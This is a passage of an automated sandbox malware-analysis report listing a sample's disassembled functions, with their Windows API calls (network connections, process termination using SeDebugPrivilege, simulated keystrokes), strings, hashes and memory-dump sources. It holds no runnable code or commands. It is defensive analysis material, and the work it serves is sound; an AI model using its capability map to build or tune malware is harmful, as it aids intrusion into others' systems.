                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0068A301
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: HandleLoadMessageModuleString_wcslen
                                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                  • API String ID: 858772685-4153970271
                                                                  • Opcode ID: fa69f3af7135d9181881aaa687c1c929a88a087feff11f2fef582570af3e47ad
                                                                  • Instruction ID: c83533968a523b76bb723ebe443b36da22e3ac9487b5a9159b9dd772ba20abb8
                                                                  • Opcode Fuzzy Hash: fa69f3af7135d9181881aaa687c1c929a88a087feff11f2fef582570af3e47ad
                                                                  • Instruction Fuzzy Hash: FC218F3280021EEBDF12AB90DC16EEE7B7ABF18300F044569B605690A2EB719658DB51
                                                                  Function 006829EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetParent.USER32 ref: 006829F8
                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00682A0D
                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00682A9A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ClassMessageNameParentSend
                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                  • API String ID: 1290815626-3381328864
                                                                  • Opcode ID: 69f6ef1fd4bb5095521ef22da4759a4ae8e54c915d19265a4d05b94465fa7d9b
                                                                  • Instruction ID: 6a6f1c672c91e366ea42675ef36fabdc186779cdbbf4ffb1fc1f5b92f89921a6
                                                                  • Opcode Fuzzy Hash: 69f6ef1fd4bb5095521ef22da4759a4ae8e54c915d19265a4d05b94465fa7d9b
                                                                  • Instruction Fuzzy Hash: 49112976644707B9F72C7221EC27DE6379F8F15B64B200226F905E50D1FF63A8514B18
                                                                  Function 00627567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetClientRect.USER32(?,?), ref: 0062758D
                                                                  • GetWindowRect.USER32(?,?), ref: 006275CE
                                                                  • ScreenToClient.USER32(?,?), ref: 006275F6
                                                                  • GetClientRect.USER32(?,?), ref: 0062773A
                                                                  • GetWindowRect.USER32(?,?), ref: 0062775B
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Client$Window$Screen
                                                                  • String ID:
                                                                  • API String ID: 1296646539-0
                                                                  • Opcode ID: 1953c9f50e4b1c1359e9ff8aef2e5fb813eae4fc4a2fc5574e62f0b27d33b418
                                                                  • Instruction ID: 0005b4d158110bcc5eedd528690b1fec4f18a6c5fedd14971970117bd4695ff1
                                                                  • Opcode Fuzzy Hash: 1953c9f50e4b1c1359e9ff8aef2e5fb813eae4fc4a2fc5574e62f0b27d33b418
                                                                  • Instruction Fuzzy Hash: 3EC15979904A5AEFDB10CFA8D940BEDB7B2FF08310F14951AE895A7350DB34AA41DF60
                                                                  Function 0065D210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                  • String ID:
                                                                  • API String ID: 1282221369-0
                                                                  • Opcode ID: 5b5baf977a7cde9ff2d7a6a3e47cad47d2325036b43d4a891fbde90beda24f33
                                                                  • Instruction ID: fc2e38c597b0f9eaa5a16a7f2a682721a12b6feae5aaa4cfcbd88268be5cde89
                                                                  • Opcode Fuzzy Hash: 5b5baf977a7cde9ff2d7a6a3e47cad47d2325036b43d4a891fbde90beda24f33
                                                                  • Instruction Fuzzy Hash: DB612571905301AFDB31AF79D891ABE7BA7AF03362F04016DEE44AB3C1E6319948C795
                                                                  Function 006B5B72 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 006B5C24
                                                                  • ShowWindow.USER32(?,00000000), ref: 006B5C65
                                                                  • ShowWindow.USER32(?,00000005,?,00000000), ref: 006B5C6B
                                                                  • SetFocus.USER32(?,?,00000005,?,00000000), ref: 006B5C6F
                                                                    • Part of subcall function 006B79F2: DeleteObject.GDI32(00000000), ref: 006B7A1E
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 006B5CAB
                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 006B5CB8
                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 006B5CEB
                                                                  • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 006B5D25
                                                                  • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 006B5D34
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                  • String ID:
                                                                  • API String ID: 3210457359-0
                                                                  • Opcode ID: d0a3d1572fbb638728a216ee6cca9ee77431bbdec8d18fe9449f4514a77caf21
                                                                  • Instruction ID: 518653da4ae6bcd794a9dce3ec42987784557763ef7aa56d368eb6dc62dc75f6
                                                                  • Opcode Fuzzy Hash: d0a3d1572fbb638728a216ee6cca9ee77431bbdec8d18fe9449f4514a77caf21
                                                                  • Instruction Fuzzy Hash: 3C51B0B4640B09BFEF649F14CC4ABD83BA3EB04354F144229FA269A2E1C771A9D0DB44
                                                                  Function 0069CB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0069CBC7
                                                                  • GetLastError.KERNEL32 ref: 0069CBDA
                                                                  • SetEvent.KERNEL32(?), ref: 0069CBEE
                                                                    • Part of subcall function 0069CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0069CCB7
                                                                    • Part of subcall function 0069CC98: GetLastError.KERNEL32 ref: 0069CD67
                                                                    • Part of subcall function 0069CC98: SetEvent.KERNEL32(?), ref: 0069CD7B
                                                                    • Part of subcall function 0069CC98: InternetCloseHandle.WININET(00000000), ref: 0069CD86
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                  • String ID:
                                                                  • API String ID: 337547030-0
                                                                  • Opcode ID: 2dfe7e5b27d428fa65cb53cb4bdee1d1c86016c24d1d7bfe22b8420ba00a60b0
                                                                  • Instruction ID: 1b4478f7be2d86cca1d640f88e94258a92fa946ceb645422185df30fcc859cd9
                                                                  • Opcode Fuzzy Hash: 2dfe7e5b27d428fa65cb53cb4bdee1d1c86016c24d1d7bfe22b8420ba00a60b0
                                                                  • Instruction Fuzzy Hash: 5E318BB1100B01EFCF219F61CD44AAABBEEFF04324B04452DF95A86A10DB30E855AB60
                                                                  Function 00682EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00684393: GetWindowThreadProcessId.USER32(?,00000000), ref: 006843AD
                                                                    • Part of subcall function 00684393: GetCurrentThreadId.KERNEL32 ref: 006843B4
                                                                    • Part of subcall function 00684393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00682F00), ref: 006843BB
                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00682F0A
                                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00682F28
                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00682F2C
                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00682F36
                                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00682F4E
                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00682F52
                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00682F5C
                                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00682F70
                                                                  • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00682F74
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                  • String ID:
                                                                  • API String ID: 2014098862-0
                                                                  • Opcode ID: 61b1a776ca0d284a18e7443699ce06e54137b09dd27c9cb0502a1cc133548050
                                                                  • Instruction ID: 14dd328df90bb97f8f97fd9d47d9987a64c78c002a92bbc74ab4cf600c3a8ce8
                                                                  • Opcode Fuzzy Hash: 61b1a776ca0d284a18e7443699ce06e54137b09dd27c9cb0502a1cc133548050
                                                                  • Instruction Fuzzy Hash: FD01D4B0784210BBFB207769DC8AF593F5BDB4EB11F100116F318AE1E0DDE26484CAA9
                                                                  Function 00682150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00681D95,?,?,00000000), ref: 00682159
                                                                  • HeapAlloc.KERNEL32(00000000,?,00681D95,?,?,00000000), ref: 00682160
                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00681D95,?,?,00000000), ref: 00682175
                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00681D95,?,?,00000000), ref: 0068217D
                                                                  • DuplicateHandle.KERNEL32(00000000,?,00681D95,?,?,00000000), ref: 00682180
                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00681D95,?,?,00000000), ref: 00682190
                                                                  • GetCurrentProcess.KERNEL32(00681D95,00000000,?,00681D95,?,?,00000000), ref: 00682198
                                                                  • DuplicateHandle.KERNEL32(00000000,?,00681D95,?,?,00000000), ref: 0068219B
                                                                  • CreateThread.KERNEL32(00000000,00000000,006821C1,00000000,00000000,00000000), ref: 006821B5
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                  • String ID:
                                                                  • API String ID: 1957940570-0
                                                                  • Opcode ID: 318086bf0b1852e9fd93bfbef1250c35a6660e5c5e0c0d67b79fcde9e4aa6259
                                                                  • Instruction ID: f16fb22fa0d04606030e119b8fae48d13511dacb4120e943081ad0478fd89fc9
                                                                  • Opcode Fuzzy Hash: 318086bf0b1852e9fd93bfbef1250c35a6660e5c5e0c0d67b79fcde9e4aa6259
                                                                  • Instruction Fuzzy Hash: 3A01A8F5240304BFE710AFA9DC4DF6B7BADEB89711F015511FA05DB1A1DA709840CB20
                                                                  Function 0068CE7B Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 191windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 006241EA: _wcslen.LIBCMT ref: 006241EF
                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0068CF99
                                                                  • _wcslen.LIBCMT ref: 0068CFE0
                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0068D047
                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0068D075
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info_wcslen$Default
                                                                  • String ID: ,*o$0$<*o
                                                                  • API String ID: 1227352736-450841681
                                                                  • Opcode ID: 56c52c59de1968e14acd05f5ba563dfe0fc8813b4263bdf8ddf8be5e561a3c11
                                                                  • Instruction ID: 4dce0ee3a1d1dfefbfd170250f40a7a523856f61e691ff2c63e2375dec6a6d86
                                                                  • Opcode Fuzzy Hash: 56c52c59de1968e14acd05f5ba563dfe0fc8813b4263bdf8ddf8be5e561a3c11
                                                                  • Instruction Fuzzy Hash: FE51DF716043019BE724BF28D845BABBBEAAF45324F040B2DFA91D72D1DB70C945CB62
                                                                  Function 006AAB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0068DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 0068DDAC
                                                                    • Part of subcall function 0068DD87: Process32FirstW.KERNEL32(00000000,?), ref: 0068DDBA
                                                                    • Part of subcall function 0068DD87: CloseHandle.KERNEL32(00000000), ref: 0068DE87
                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006AABCA
                                                                  • GetLastError.KERNEL32 ref: 006AABDD
                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006AAC10
                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 006AACC5
                                                                  • GetLastError.KERNEL32(00000000), ref: 006AACD0
                                                                  • CloseHandle.KERNEL32(00000000), ref: 006AAD21
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                  • String ID: SeDebugPrivilege
                                                                  • API String ID: 2533919879-2896544425
                                                                  • Opcode ID: 0206afca4cee187b65a188f96c5153170cbc701de1225ca64c7cfb8452db8847
                                                                  • Instruction ID: ab38782aea33f6b705362b9e02f3aaa769d1e5bef2dca7821a7c749272a7e5e4
                                                                  • Opcode Fuzzy Hash: 0206afca4cee187b65a188f96c5153170cbc701de1225ca64c7cfb8452db8847
                                                                  • Instruction Fuzzy Hash: 97618A702046429FE320EF54C494F65BBA2AF45318F18859DE4A64FBA3C772EC85CF92
                                                                  Function 006B4322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 006B43C1
                                                                  • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 006B43D6
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 006B43F0
                                                                  • _wcslen.LIBCMT ref: 006B4435
                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 006B4462
                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 006B4490
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window_wcslen
                                                                  • String ID: SysListView32
                                                                  • API String ID: 2147712094-78025650
                                                                  • Opcode ID: cca5802ae5d10cc5657c3c6f9845758990b24c7c4f3c837ae019028210bc2ac2
                                                                  • Instruction ID: 21a5c769a31fd2f67e7fcbeb2cbd639b4b822080dbc45f54ab4378d32863239b
                                                                  • Opcode Fuzzy Hash: cca5802ae5d10cc5657c3c6f9845758990b24c7c4f3c837ae019028210bc2ac2
                                                                  • Instruction Fuzzy Hash: EA41B2B1A00319ABDF119F64CC45BEA7BAAFF08350F14052AF954E7292DB759990CB90
                                                                  Function 0068C625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0068C6C4
                                                                  • IsMenu.USER32(00000000), ref: 0068C6E4
                                                                  • CreatePopupMenu.USER32 ref: 0068C71A
                                                                  • GetMenuItemCount.USER32(01536568), ref: 0068C76B
                                                                  • InsertMenuItemW.USER32(01536568,?,00000001,00000030), ref: 0068C793
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                  • String ID: 0$2
                                                                  • API String ID: 93392585-3793063076
                                                                  • Opcode ID: 2528860846fd098ba72dc4d1f7fe434dd561c268e3032e20aa33b3b2ad5712cd
                                                                  • Instruction ID: 7c1565f14b0f8fb3d86dd363f419eed9ed88d79111304882d31bd996b46d319b
                                                                  • Opcode Fuzzy Hash: 2528860846fd098ba72dc4d1f7fe434dd561c268e3032e20aa33b3b2ad5712cd
                                                                  • Instruction Fuzzy Hash: 67519E706002059BDF20EF78D884AEEBBF6AF48324F24436AE9119B391E7709945CF71
                                                                  Function 006219CD Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 121keyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 006219E1
                                                                  • ScreenToClient.USER32(00000000,?), ref: 006219FE
                                                                  • GetAsyncKeyState.USER32(00000001), ref: 00621A23
                                                                  • GetAsyncKeyState.USER32(00000002), ref: 00621A3D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                  • String ID: $'b$$'b
                                                                  • API String ID: 4210589936-917026582
                                                                  • Opcode ID: 87912675b182f703cae3b1baa4fd863c65f4741eb1cc59a3ea059c52370463cc
                                                                  • Instruction ID: 9e35a8a2546a25ee2f01b10f8eee049a6527a6d57608e3e5207339d532a4745a
                                                                  • Opcode Fuzzy Hash: 87912675b182f703cae3b1baa4fd863c65f4741eb1cc59a3ea059c52370463cc
                                                                  • Instruction Fuzzy Hash: AA4193B160852AFFDF059F68D844AEDF772FB06324F20821AE429A6390D7305A94CF91
                                                                  Function 006B86FC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 006B8740
                                                                  • SetWindowLongW.USER32(00000000,000000F0,?), ref: 006B8765
                                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 006B877D
                                                                  • GetSystemMetrics.USER32(00000004), ref: 006B87A6
                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0069C1F2,00000000), ref: 006B87C6
                                                                    • Part of subcall function 0062249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006224B0
                                                                  • GetSystemMetrics.USER32(00000004), ref: 006B87B1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long$MetricsSystem
                                                                  • String ID: (o
                                                                  • API String ID: 2294984445-1684096767
                                                                  • Opcode ID: 8547c02f49b4b8634ac1330e42a59f11ee9c016a13a5e9f5a0127b536ee8a594
